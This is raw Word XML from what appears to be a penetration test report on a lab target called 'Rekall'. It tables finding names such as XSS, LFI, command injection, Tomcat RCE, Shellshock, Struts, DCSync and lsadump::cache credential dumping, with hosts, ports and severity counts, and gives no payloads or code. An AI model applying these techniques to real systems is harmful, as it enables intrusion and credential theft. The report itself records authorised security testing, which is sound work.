              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> Cross Site Scripting (XSS)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffff00" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021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1B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Local File Inclusion (LFI) </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffff00" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021C">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21D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Data Exposure</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffff00" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021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1F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Exclusion Standard Setting Exposure</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffff00" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000220">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221">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Command Injection</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffff00" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022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23">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">PII Data Exposure</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffff00" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022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25">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Certificate Information Exposure</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffff00" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000226">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227">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">A</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">pache Tomcat Remote Code Execution Vulnerability</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffff00" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022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29">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Shellshock</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffff00" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022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2B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Struts</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffff00" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022C">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2D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Exposed Password Hash in GitHub Rekall Site</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffff00" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022E">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22F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">NMAP Scan and FTP Exploit</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffff00" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023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31">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">POP3</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffff00" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023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33">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Security Accounts Manager Database</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffff00" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023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35">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">lsadump::cache</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffff00" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000236">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ff0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ff0000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="345" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffff00" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000237">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">DCSync Attack</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffff00" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023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239">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffff00" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023A">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23B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffff00" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023C">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23D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffff00" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023E">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23F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffff00" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000240">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241">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffff00" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000242">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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246">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247">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248">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249">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24A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">totalrekall.xyz, 192.168.13.10 - 192.168.13.14, 172.22.117.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="532" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024B">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24C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">21, 25, 110</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024D">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24E">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24F">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250">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251">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="360" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000252">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253">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="390" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000254">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255">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256">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257">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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sectPr>
      <w:headerReference r:id="rId30" w:type="default"/>
      <w:footerReference r:id="rId31" w:type="default"/>
      <w:footerReference r:id="rId32" w:type="first"/>
      <w:footerReference r:id="rId33"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19.jpg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.jpg"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.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24.jpg"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.jpg"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.jp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3.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.jpg"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.jpg"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.jpg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.jpg"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.jpg"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.jpg"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.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